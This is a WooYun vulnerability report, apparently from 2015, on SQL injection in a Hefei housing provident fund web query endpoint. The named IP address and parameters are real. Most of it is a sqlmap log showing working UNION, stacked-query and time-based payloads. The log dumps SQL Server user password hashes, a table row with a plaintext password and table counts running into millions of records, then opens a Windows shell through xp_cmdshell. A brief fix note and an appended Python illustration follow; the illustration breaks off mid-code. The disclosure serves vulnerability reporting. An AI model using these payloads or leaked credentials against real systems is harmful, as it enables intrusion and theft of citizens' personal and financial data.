WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --------- http://drop.zone.ci/
2015-08-17: details reported to the vendor, awaiting handling. 2015-08-19: vendor confirmed; details disclosed to the vendor only. 2015-08-29: details disclosed to core white hats and relevant domain experts. 2015-09-08: details disclosed to ordinary white hats. 2015-09-18: details disclosed to intern white hats. 2015-10-03: details disclosed to the public.
Another reporter has already submitted this, but a second parameter at the same address is also SQL-injectable, and the one already reported is still unfixed; it is only a matter of time before it is exploited!~~~
WooYun: Hefei Housing Provident Fund query system has POST injection (interactive system shell possible / affects fund users). One more parameter is injectable; the one already reported is still unfixed and exploitation still works!~~~ Captured request:
http://220.178.98.86/hfgjj/jsp/web/public/search/getPw.jsp (POST)zgyhzh=1&xm=2&sjhm=3
[17:02:53] [INFO] parsing HTTP request from 'E:\8.txt'
[17:02:53] [INFO] testing connection to the target URL
[17:02:53] [INFO] testing if the target URL is stable. This can take a couple of seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[17:02:57] [INFO] target URL is stable
[17:02:57] [INFO] testing if POST parameter 'zgyhzh' is dynamic
[17:02:57] [WARNING] POST parameter 'zgyhzh' does not appear dynamic
[17:02:57] [WARNING] heuristic (basic) test shows that POST parameter 'zgyhzh' might not be injectable
[17:02:57] [INFO] testing for SQL injection on POST parameter 'zgyhzh'
[17:02:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:02:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:03:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:03:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[17:03:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:03:02] [INFO] testing 'MySQL inline queries'
[17:03:02] [INFO] testing 'PostgreSQL inline queries'
[17:03:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:03:03] [INFO] testing 'Oracle inline queries'
[17:03:03] [INFO] testing 'SQLite inline queries'
[17:03:03] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:03:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:03:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:03:16] [INFO] POST parameter 'zgyhzh' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[17:03:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:03:26] [INFO] POST parameter 'zgyhzh' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
[17:03:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:03:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:03:27] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:03:27] [INFO] target URL appears to have 9 columns in query
[17:03:29] [INFO] POST parameter 'zgyhzh' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'zgyhzh' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[17:03:31] [INFO] testing if POST parameter 'xm' is dynamic
[17:03:31] [WARNING] POST parameter 'xm' does not appear dynamic
[17:03:31] [WARNING] heuristic (basic) test shows that POST parameter 'xm' might not be injectable
[17:03:31] [INFO] testing for SQL injection on POST parameter 'xm'
[17:03:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:03:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:03:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:03:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[17:03:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:03:38] [INFO] testing 'MySQL inline queries'
[17:03:38] [INFO] testing 'PostgreSQL inline queries'
[17:03:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:03:38] [INFO] testing 'Oracle inline queries'
[17:03:38] [INFO] testing 'SQLite inline queries'
[17:03:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:03:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:03:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:03:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:03:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[17:03:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:03:44] [INFO] testing 'Oracle AND time-based blind'
[17:03:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[17:03:58] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[17:04:12] [INFO] testing 'Generic UNION query (77) - 1 to 10 columns'
[17:04:12] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[17:04:12] [WARNING] applying generic concatenation with double pipes ('||')
[17:04:28] [WARNING] POST parameter 'xm' is not injectable
[17:04:28] [INFO] testing if POST parameter 'sjhm' is dynamic
[17:04:28] [WARNING] POST parameter 'sjhm' does not appear dynamic
[17:04:29] [WARNING] heuristic (basic) test shows that POST parameter 'sjhm' might not be injectable
[17:04:29] [INFO] testing for SQL injection on POST parameter 'sjhm'
[17:04:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:04:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[17:04:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:04:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[17:04:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:04:34] [INFO] testing 'MySQL inline queries'
[17:04:34] [INFO] testing 'PostgreSQL inline queries'
[17:04:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[17:04:34] [INFO] testing 'Oracle inline queries'
[17:04:34] [INFO] testing 'SQLite inline queries'
[17:04:34] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:04:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[17:04:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[17:04:47] [INFO] POST parameter 'sjhm' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[17:04:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[17:04:57] [INFO] POST parameter 'sjhm' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
[17:04:57] [INFO] testing 'Generic UNION query (77) - 1 to 20 columns'
[17:04:58] [INFO] POST parameter 'sjhm' is 'Generic UNION query (77) - 1 to 20 columns' injectable
POST parameter 'sjhm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 478 HTTP(s) requests:
---
Place: POST
Parameter: zgyhzh
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: zgyhzh=1' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(119)+CHAR(118)+CHAR(110)+CHAR(113)+CHAR(66)+CHAR(104)+CHAR(78)+CHAR(98)+CHAR(82)+CHAR(119)+CHAR(118)+CHAR(111)+CHAR(104)+CHAR(99)+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- &xm=2&sjhm=3

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: zgyhzh=1'; WAITFOR DELAY '0:0:5'--&xm=2&sjhm=3

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: zgyhzh=1' WAITFOR DELAY '0:0:5'--&xm=2&sjhm=3

Place: POST
Parameter: sjhm
    Type: UNION query
    Title: Generic UNION query (77) - 9 columns
    Payload: zgyhzh=1&xm=2&sjhm=3' UNION ALL SELECT 77,77,CHAR(113)+CHAR(119)+CHAR(118)+CHAR(110)+CHAR(113)+CHAR(86)+CHAR(77)+CHAR(112)+CHAR(67)+CHAR(99)+CHAR(74)+CHAR(70)+CHAR(100)+CHAR(86)+CHAR(83)+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+CHAR(113),77,77,77,77,77,77--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: zgyhzh=1&xm=2&sjhm=3'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: zgyhzh=1&xm=2&sjhm=3' WAITFOR DELAY '0:0:5'--
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: zgyhzh, type: Single quoted string (default)
[1] place: POST, parameter: sjhm, type: Single quoted string
[q] Quit
> 0
[17:05:13] [INFO] testing Microsoft SQL Server
[17:05:14] [INFO] confirming Microsoft SQL Server
[17:05:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.22, JSP
back-end DBMS: Microsoft SQL Server 2000
[17:08:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.22, JSP
back-end DBMS: Microsoft SQL Server 2000
[17:08:11] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
current user: 'sa'
[17:08:14] [INFO] fetching current database
current database: 'hfgjj'
[17:08:14] [INFO] testing if current user is DBA
current user is DBA: True
DBA privileges.
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: sjhm, type: Single quoted string (default)
[1] place: POST, parameter: zgyhzh, type: Single quoted string
[q] Quit
> 1
[17:09:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.22, JSP
back-end DBMS: Microsoft SQL Server 2000
[17:09:10] [INFO] fetching current database
current database: 'hfgjj'
[17:09:10] [INFO] fetching database users
[17:09:10] [INFO] the SQL query used returns 4 entries
[17:09:10] [INFO] starting 4 threads
[17:09:10] [INFO] resumed: "12329"
[17:09:10] [INFO] resumed: "sa"
[17:09:10] [INFO] resumed: "BUILTIN\\Administrators"
[17:09:10] [INFO] resumed: "hengke"
database management system users [4]:
[*] 12329
[*] BUILTIN\Administrators
[*] hengke
[*] sa
[17:09:10] [INFO] fetching database users password hashes
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[17:09:12] [INFO] the SQL query used returns 5 entries
[17:09:12] [INFO] starting 5 threads
[17:09:12] [INFO] retrieved: "12329","0x0100f07081700cfaf759e66438ea2f3ba8716...
[17:09:13] [INFO] retrieved: " "," "
[17:09:13] [INFO] retrieved: "BUILTIN\\Administrators"," "
[17:09:13] [INFO] retrieved: "hengke","0x0100db4afb45cf379dd1faabfd592a4b6c83...
[17:09:13] [INFO] retrieved: "sa","0x0100d341535b397ce619be87c4a2592e80b579c0...
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] 12329 [1]:
    password hash: 0x0100f07081700cfaf759e66438ea2f3ba8716645d9e13d8ddb7e0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e
        header: 0x0100
        salt: f0708170
        mixedcase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e
        uppercase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e
[*] BUILTIN\Administrators [1]:
    password hash: NULL
[*] hengke [1]:
    password hash: 0x0100db4afb45cf379dd1faabfd592a4b6c83d0b56e1c1d599309ba0ec5c2775dace3924d902c8041900c6b0df944
        header: 0x0100
        salt: db4afb45
        mixedcase: cf379dd1faabfd592a4b6c83d0b56e1c1d599309
        uppercase: ba0ec5c2775dace3924d902c8041900c6b0df944
[*] sa [1]:
    password hash: 0x0100d341535b397ce619be87c4a2592e80b579c006713a72aacc606f04f250d80f97cd3d5f7c97fcaad96fba05ae
        header: 0x0100
        salt: d341535b
        mixedcase: 397ce619be87c4a2592e80b579c006713a72aacc
        uppercase: 606f04f250d80f97cd3d5f7c97fcaad96fba05ae
[17:10:12] [INFO] the SQL query used returns 7 entries
[17:10:12] [INFO] starting 7 threads
[17:10:12] [INFO] retrieved: "msdb"
[17:10:12] [INFO] retrieved: "hfgjj"
[17:10:12] [INFO] retrieved: "master"
[17:10:12] [INFO] retrieved: "hengke"
[17:10:12] [INFO] retrieved: "gjj"
[17:10:12] [INFO] retrieved: "model"
[17:10:12] [INFO] retrieved: "tempdb"
available databases [7]:
[*] gjj
[*] hengke
[*] hfgjj
[*] master
[*] model
[*] msdb
[*] tempdb
[17:10:56] [INFO] the SQL query used returns 109 entries
[17:10:56] [INFO] starting 10 threads
[17:10:56] [INFO] retrieved: "dbo.cms_hdjl"
[17:10:56] [INFO] retrieved: "dbo.D99_REG"
[17:10:57] [INFO] retrieved: "dbo.advise_upload"
[17:10:57] [INFO] retrieved: "dbo.class_supply"
[17:10:57] [INFO] retrieved: "dbo.culture_info"
[17:10:57] [INFO] retrieved: "dbo.CULTURE_INVESTDETAIL"
[17:10:57] [INFO] retrieved: "dbo.dtproperties"
[17:10:58] [INFO] retrieved: "dbo.D99_CMD"
[17:10:58] [INFO] retrieved: "dbo.DIY_TEMPTALBLE"
[17:10:58] [INFO] retrieved: "dbo.h_fangjian"
[17:10:58] [INFO] retrieved: "dbo.fellow_link"
[17:10:58] [INFO] retrieved: "dbo.culture_replyinfo"
[17:10:58] [INFO] retrieved: "dbo.fellow_class"
[17:10:58] [INFO] retrieved: "dbo.h_loudong"
[17:10:58] [INFO] retrieved: "dbo.fagui"
[17:10:58] [INFO] retrieved: "dbo.focus_user"
[17:10:59] [INFO] retrieved: "dbo.hdzx"
[17:10:59] [INFO] retrieved: "dbo.CULTURE_INVESTED"
[17:10:59] [INFO] retrieved: "dbo.D99_Tmp"
[17:10:59] [INFO] retrieved: "dbo.join_table"
[17:10:59] [INFO] retrieved: "dbo.h_quyu"
[17:10:59] [INFO] retrieved: "dbo.mail_material"
[17:11:00] [INFO] retrieved: "dbo.INNER_INFO"
[17:11:00] [INFO] retrieved: "dbo.kill_kk"
[17:11:00] [INFO] retrieved: "dbo.pbcatfmt"
[17:11:00] [INFO] retrieved: "dbo.pbcattbl"
[17:11:00] [INFO] retrieved: "dbo.pbcatcol"
[17:11:01] [INFO] retrieved: "dbo.pbcatvld"
[17:11:01] [INFO] retrieved: "dbo.sqlmapoutput"
[17:11:01] [INFO] retrieved: "dbo.renyuan_dw"
[17:11:01] [INFO] retrieved: "dbo.sys_log"
[17:11:01] [INFO] retrieved: "dbo.SYS_MENU"
[17:11:02] [INFO] retrieved: "dbo.supply_note"
[17:11:02] [INFO] retrieved: "dbo.sys_role_resource"
[17:11:02] [INFO] retrieved: "dbo.sys_siteprevilige"
[17:11:02] [INFO] retrieved: "dbo.sys_role_resource"
[17:11:02] [INFO] retrieved: "dbo.sys_resource"
[17:11:03] [INFO] retrieved: "dbo.sys_unit_role"
[17:11:03] [INFO] retrieved: "dbo.sys_siteprevilige"
[17:11:03] [INFO] retrieved: "dbo.sys_unittype"
[17:11:03] [INFO] retrieved: "dbo.sys_unit_role"
[17:11:03] [INFO] retrieved: "dbo.SYS_SITERIGHT"
[17:11:03] [INFO] retrieved: "dbo.LIFA_NEWS"
[17:11:04] [INFO] retrieved: "dbo.sys_userproperty"
[17:11:04] [INFO] retrieved: "dbo.pbcatedt"
[17:11:04] [INFO] retrieved: "dbo.SYS_USERGROUP"
[17:11:04] [INFO] retrieved: "dbo.sys_user_role"
[17:11:05] [INFO] retrieved: "dbo.renyuan_dw"
[17:11:05] [INFO] retrieved: "dbo.sys_user_role"
[17:11:05] [INFO] retrieved: "dbo.sys_user_unit"
[17:11:05] [INFO] retrieved: "dbo.tongji"
[17:11:05] [INFO] retrieved: "dbo.syssegments"
[17:11:05] [INFO] retrieved: "dbo.supply_replynote"
[17:11:06] [INFO] retrieved: "dbo.v_168_dwhjqk_old"
[17:11:06] [INFO] retrieved: "dbo.tz_js"
[17:11:06] [INFO] retrieved: "dbo.tz_note"
[17:11:06] [INFO] retrieved: "dbo.v_168_dwhjqk_old"
[17:11:06] [INFO] retrieved: "dbo.v_09_10_xh"
[17:11:06] [INFO] retrieved: "dbo.v_168_dz_old_61"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwzz_old"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwinfo"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwzz_old"
[17:11:07] [INFO] retrieved: "dbo.v_168_dz_old_61"
[17:11:07] [INFO] retrieved: "dbo.v_168_dwdz"
[17:11:07] [INFO] retrieved: "dbo.v_168_dz_old_65"
[17:11:08] [INFO] retrieved: "dbo.v_168_dz_old_67"
[17:11:08] [INFO] retrieved: "dbo.v_168_dz_old_66"
[17:11:08] [INFO] retrieved: "dbo.hero_table"
[17:11:08] [INFO] retrieved: "dbo.v_168_dz1"
[17:11:09] [INFO] retrieved: "dbo.v_168_dz_old_68"
[17:11:09] [INFO] retrieved: "dbo.v_168_dz_old_yl"
[17:11:09] [INFO] retrieved: "dbo.v_168_dz2"
[17:11:09] [INFO] retrieved: "dbo.v_168_gjd"
[17:11:09] [INFO] retrieved: "dbo.v_dw_gzmx"
[17:11:09] [INFO] retrieved: "dbo.v_dw_gjmx_old"
[17:11:09] [INFO] retrieved: "dbo.v_dwhjqk_old"
[17:11:10] [INFO] retrieved: "dbo.v_dwhjqk_old"
[17:11:10] [INFO] retrieved: "dbo.v_168_info_old"
[17:11:10] [INFO] retrieved: "dbo.v_update_Time"
[17:11:10] [INFO] retrieved: "dbo.v_save_etps_password"
[17:11:10] [INFO] retrieved: "dbo.v_save_password"
[17:11:11] [INFO] retrieved: "dbo.v_168_info_old"
[17:11:11] [INFO] retrieved: "dbo.v_web_hdmx"
[17:11:11] [INFO] retrieved: "dbo.v_house_info"
[17:11:11] [INFO] retrieved: "dbo.v_web_hdqk1"
[17:11:11] [INFO] retrieved: "dbo.v_web_hdqk1"
[17:11:11] [INFO] retrieved: "dbo.v_web_sdqk"
[17:11:12] [INFO] retrieved: "dbo.v_web_shgc"
[17:11:12] [INFO] retrieved: "dbo.v_dwzz_old"
[17:11:12] [INFO] retrieved: "dbo.v_web_wtmx11"
[17:11:12] [INFO] retrieved: "dbo.v_web_wtmx10"
[17:11:13] [INFO] retrieved: "dbo.v_web_wtmx12"
[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"
[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"
[17:11:13] [INFO] retrieved: "dbo.web_dwinfo"
[17:11:13] [INFO] retrieved: "dbo.v_web_wttqmx_old"
[17:11:13] [INFO] retrieved: "dbo.xzsp_dw"
[17:11:13] [INFO] retrieved: "dbo.v_web_wtmx09"
[17:11:13] [INFO] retrieved: "dbo.WELFARE_NEWS"
[17:11:14] [INFO] retrieved: "dbo.sysconstraints"
[17:11:14] [INFO] retrieved: "dbo.zxbs"
[17:11:14] [INFO] retrieved: "dbo.zhut"
[17:11:15] [WARNING] cannot properly display Unicode characters inside Windows command prompt (http://bugs.python.org/issue1602). All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[17:11:15] [INFO] retrieved: "dbo.??"
[17:11:15] [INFO] retrieved: "dbo.wenjian"
[17:11:15] [INFO] retrieved: "dbo.xzsp_dw"
[17:11:15] [INFO] retrieved: "dbo.xzxk"
[17:11:16] [INFO] retrieved: "dbo.v_168_dz_old_61"
[17:11:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[17:11:16] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[17:11:18] [INFO] retrieved: "dbo.h_loupan"
[17:11:18] [INFO] retrieved: "dbo.v_dw_gjmx_old"
Database: hfgjj
[109 tables]
+----------------------+
| CULTURE_INVESTDETAIL |
| CULTURE_INVESTED     |
| D99_CMD              |
| D99_REG              |
| D99_Tmp              |
| DIY_TEMPTALBLE       |
| INNER_INFO           |
| LIFA_NEWS            |
| SYS_MENU             |
| SYS_SITERIGHT        |
| SYS_USERGROUP        |
| WELFARE_NEWS         |
| advise_upload        |
| class_supply         |
| cms_hdjl             |
| culture_info         |
| culture_replyinfo    |
| dtproperties         |
| fagui                |
| fellow_class         |
| fellow_link          |
| focus_user           |
| h_fangjian           |
| h_loudong            |
| h_loupan             |
| h_quyu               |
| hdzx                 |
| hero_table           |
| join_table           |
| kill_kk              |
| mail_material        |
| pbcatcol             |
| pbcatedt             |
| pbcatfmt             |
| pbcattbl             |
| pbcatvld             |
| renyuan_dw           |
| renyuan_dw           |
| sqlmapoutput         |
| supply_note          |
| supply_replynote     |
| sys_log              |
| sys_resource         |
| sys_role_resource    |
| sys_role_resource    |
| sys_siteprevilige    |
| sys_siteprevilige    |
| sys_unit_role        |
| sys_unit_role        |
| sys_unittype         |
| sys_user_role        |
| sys_user_role        |
| sys_user_unit        |
| sys_userproperty     |
| sysconstraints       |
| syssegments          |
| tongji               |
| tz_js                |
| tz_note              |
| v_09_10_xh           |
| v_168_dwdz           |
| v_168_dwhjqk_old     |
| v_168_dwhjqk_old     |
| v_168_dwinfo         |
| v_168_dwzz_old       |
| v_168_dwzz_old       |
| v_168_dz1            |
| v_168_dz2            |
| v_168_dz_old_61      |
| v_168_dz_old_61      |
| v_168_dz_old_61      |
| v_168_dz_old_65      |
| v_168_dz_old_66      |
| v_168_dz_old_67      |
| v_168_dz_old_68      |
| v_168_dz_old_yl      |
| v_168_gjd            |
| v_168_info_old       |
| v_168_info_old       |
| v_dw_gjmx_old        |
| v_dw_gjmx_old        |
| v_dw_gzmx            |
| v_dwhjqk_old         |
| v_dwhjqk_old         |
| v_dwzz_old           |
| v_house_info         |
| v_save_etps_password |
| v_save_password      |
| v_update_Time        |
| v_web_hdmx           |
| v_web_hdqk1          |
| v_web_hdqk1          |
| v_web_sdqk           |
| v_web_shgc           |
| v_web_wtmx09         |
| v_web_wtmx10         |
| v_web_wtmx11         |
| v_web_wtmx12         |
| v_web_wttqmx_old     |
| v_web_wttqmx_old     |
| v_web_wttqmx_old     |
| web_dwinfo           |
| wenjian              |
| xzsp_dw              |
| xzsp_dw              |
| xzxk                 |
| zhut                 |
| zxbs                 |
| ??                   |
+----------------------+
Database: hfgjj
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| dbo.v_168_dz1            | 7603650 |
| dbo.v_web_hdmx           | 6436608 |
| dbo.v_dw_gjmx_old        | 1220549 |
| dbo.v_dw_gjmx_old        | 1220549 |
| dbo.v_web_wttqmx_old     | 1071690 |
| dbo.v_web_wttqmx_old     | 1071690 |
| dbo.v_web_wttqmx_old     | 1071690 |
| dbo.v_save_password      | 895507  |
| dbo.v_web_shgc           | 497282  |
| dbo.v_168_dwhjqk_old     | 441669  |
| dbo.v_168_dwhjqk_old     | 441669  |
| dbo.v_dwhjqk_old         | 438713  |
| dbo.v_dwhjqk_old         | 438713  |
| dbo.v_168_dz_old_yl      | 424834  |
| dbo.v_168_info_old       | 374905  |
| dbo.v_168_info_old       | 374905  |
| dbo.v_web_wtmx12         | 238842  |
| dbo.v_168_dwzz_old       | 165814  |
| dbo.v_168_dwzz_old       | 165814  |
| dbo.v_168_dz2            | 147125  |
| dbo.v_web_wtmx10         | 120510  |
| dbo.v_web_wtmx11         | 89190   |
| dbo.v_dw_gzmx            | 76545   |
| dbo.v_dwzz_old           | 76088   |
| dbo.v_09_10_xh           | 59814   |
| dbo.v_web_wtmx09         | 34592   |
| dbo.v_web_hdqk1          | 29389   |
| dbo.v_web_hdqk1          | 29389   |
| dbo.sys_log              | 24920   |
| dbo.hdzx                 | 11659   |
| dbo.v_168_dwinfo         | 10587   |
| dbo.v_house_info         | 9579    |
| dbo.v_save_etps_password | 7666    |
| dbo.v_web_sdqk           | 4741    |
| dbo.tongji               | 4323    |
| dbo.web_dwinfo           | 3387    |
| dbo.v_168_dwdz           | 1043    |
| dbo.cms_hdjl             | 464     |
| dbo.SYS_SITERIGHT        | 360     |
| dbo.WELFARE_NEWS         | 257     |
| dbo.sys_role_resource    | 192     |
| dbo.sys_role_resource    | 192     |
| dbo.fagui                | 102     |
| dbo.wenjian              | 74      |
| dbo.supply_note          | 69      |
| dbo.sys_resource         | 60      |
| dbo.sys_user_role        | 47      |
| dbo.sys_user_role        | 47      |
| dbo.xzsp_dw              | 39      |
| dbo.xzsp_dw              | 39      |
| dbo.SYS_MENU             | 38      |
| dbo.mail_material        | 34      |
| dbo.supply_replynote     | 34      |
| dbo.sysconstraints       | 34      |
| dbo.focus_user           | 30      |
| dbo.pbcatcol             | 29      |
| dbo.kill_kk              | 21      |
| dbo.pbcatedt             | 21      |
| dbo.DIY_TEMPTALBLE       | 20      |
| dbo.pbcatfmt             | 20      |
| dbo.CULTURE_INVESTDETAIL | 13      |
| dbo.D99_CMD              | 12      |
| dbo.hero_table           | 12      |
| dbo.sys_user_unit        | 8       |
| dbo.h_quyu               | 7       |
| dbo.advise_upload        | 6       |
| dbo.xzxk                 | 6       |
| dbo.v_168_gjd            | 5       |
| dbo.INNER_INFO           | 4       |
| dbo.renyuan_dw           | 4       |
| dbo.renyuan_dw           | 4       |
| dbo.class_supply         | 3       |
| dbo.sqlmapoutput         | 3       |
| dbo.sys_unittype         | 3       |
| dbo.syssegments          | 3       |
| dbo.zxbs                 | 3       |
| dbo.CULTURE_INVESTED     | 2       |
| dbo.D99_Tmp              | 2       |
| dbo.fellow_class         | 2       |
| dbo.fellow_link          | 2       |
| dbo.h_loupan             | 2       |
| dbo.pbcattbl             | 2       |
| dbo.tz_js                | 2       |
| dbo.tz_note              | 2       |
| dbo.D99_REG              | 1       |
| dbo.h_loudong            | 1       |
| dbo.LIFA_NEWS            | 1       |
| dbo.sys_siteprevilige    | 1       |
| dbo.sys_siteprevilige    | 1       |
| dbo.v_update_Time        | 1       |
+--------------------------+---------+
The millions of records above can be leaked!~~~
Database: hfgjj
Table: v_save_password
[1 entry]
+------+------+--------------------+-------+-----------+-----------+---------+---------+----------+
| sjhm | dxjs | ftime              | allIn | dwyhzh    | zgyhzh    | todayIn | enabled | password |
+------+------+--------------------+-------+-----------+-----------+---------+---------+----------+
| null | 0    | 12 31 2014 12:58PM | 99    | 888880003 | 800978023 | 9       | NULL    | s082812  |
+------+------+--------------------+-------+-----------+-----------+---------+---------+----------+
[17:21:09] [INFO] fingerprinting the back-end DBMS operating system version and service pack
[17:21:09] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[17:21:11] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[17:21:13] [INFO] the back-end DBMS operating system is Windows 2000 Service Pack 0
[17:21:13] [INFO] testing if current user is DBA
[17:21:13] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[17:21:33] [INFO] xp_cmdshell extended procedure is available
[17:21:33] [INFO] testing if xp_cmdshell extended procedure is usable
[17:21:35] [INFO] the SQL query used returns 1 entries
[17:21:35] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:21:35] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[17:21:51] [INFO] adjusting time delay to 4 seconds due to good response times
[17:22:20] [INFO] xp_cmdshell extended procedure is usable
[17:22:20] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[17:22:20] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a] y
[17:22:31] [INFO] the SQL query used returns 12 entries
[17:22:31] [INFO] starting 10 threads
[17:22:32] [INFO] retrieved: 14
[17:22:41] [INFO] retrieved:
[17:22:46] [INFO] adjusting time delay to 3 seconds due to good response times
[17:22:51] [INFO] retrieved: Windows 2000 IP Configuration
[17:29:37] [INFO] retrieved:
[17:29:45] [INFO] retrieved: Ethernet a
As above.
Fix by filtering the input, and change the privileges.
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-08-19 09:43
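What "filter and fix" comes down to in practice, as an added example that is not part of the report or of the site's own code: the two injectable parameters are spliced into the SQL text, so a closed quote followed by a 9-column UNION ALL (the exact shape sqlmap found, since v_save_password has nine columns) lets the attacker read any column of any row, and binding the values as parameters makes the same payload inert. Everything below is an assumption: getPw.jsp's source is not on the page, so the query text is a reconstruction (xm is left out because sqlmap reported it not injectable, consistent with it never reaching the query); SQLite stands in for SQL Server 2000, so the CHAR()+CHAR() marker and the WAITFOR DELAY / xp_cmdshell stacked-query payloads are not reproduced, only the UNION path; the two account rows are constructed test data, not records from the dump.

```python
import sqlite3

# Column order of the v_save_password view as sqlmap dumped it: nine
# columns, matching the "9 columns in query" sqlmap reported.
COLUMNS = ("sjhm", "dxjs", "ftime", "allIn", "dwyhzh",
           "zgyhzh", "todayIn", "enabled", "password")


def make_db():
    """Constructed sample data (not the real records); SQLite stands in
    for the SQL Server 2000 back end."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE v_save_password ("
        "sjhm TEXT, dxjs INTEGER, ftime TEXT, allIn INTEGER, dwyhzh TEXT, "
        "zgyhzh TEXT, todayIn INTEGER, enabled TEXT, password TEXT)"
    )
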